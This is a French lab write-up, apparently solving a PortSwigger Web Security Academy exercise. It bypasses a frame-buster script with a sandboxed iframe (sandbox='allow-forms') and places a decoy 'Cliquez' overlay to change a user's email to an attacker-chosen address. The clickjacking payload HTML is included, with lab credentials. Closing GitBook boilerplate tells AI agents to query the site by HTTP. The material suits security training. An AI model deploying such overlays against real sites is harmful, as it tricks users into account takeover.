> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/clickjacking/clickjacking-with-frame-buster-script.md).

# Clickjacking avec script anti-cadre

### Clickjacking avec un script anti-encadrement

Effectuez une attaque de clickjacking qui modifie l'adresse e-mail de l'utilisateur malgré la présence d'un « frame buster ». Le laboratoire est résolu lorsque l'adresse e-mail du compte a été modifiée.

#### Identifiants fournis

* Utilisateur : `wiener`
* Mot de passe : `peter`

#### Constat initial

En essayant d'afficher la page du compte dans un simple `<iframe>`, la page renvoie le contenu suivant (exemple d

{% code overflow="wrap" %}

```html
<iframe src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=wiener"</iframe>
```

{% endcode %}

<figure><img src="/files/a78a44165ead51f0ff13cbf65ad9dcb3581e1358" alt=""><figcaption></figcaption></figure>

#### Protection observée (frame buster)

La page contient un script qui empêche l'encadrement et remplace le corps du document si la page est chargée dans un cadre :

```javascript
if(top != self) {
 window.addEventListener("DOMContentLoaded", function() {
 document.body.innerHTML = 'Cette page ne peut pas être encadrée';
 }, false);
}
```

Ce mécanisme détecte lorsque la page se trouve dans une iframe et neutralise le contenu affiché.

{% code overflow="wrap" %}

```html
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=jordan@hacked.com"</iframe>
```

{% endcode %}

<figure><img src="/files/188dcb78c4f53ef2204f7ccb2f41cf2255fec226" alt=""><figcaption></figcaption></figure>

Exemple de style et de calque d'appât utilisés

```javascript
<style>
iframe{
width: 500px;
height: 600px;
}
div{
position: relative;
top: 455px;
left: 80px;
}
</style>
<div>Cliquez</div>
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=jordan@hacked.com"</iframe>
```

<figure><img src="/files/5115fee74d097bf102c576983f27448756bcd896" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/clickjacking/clickjacking-with-frame-buster-script.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
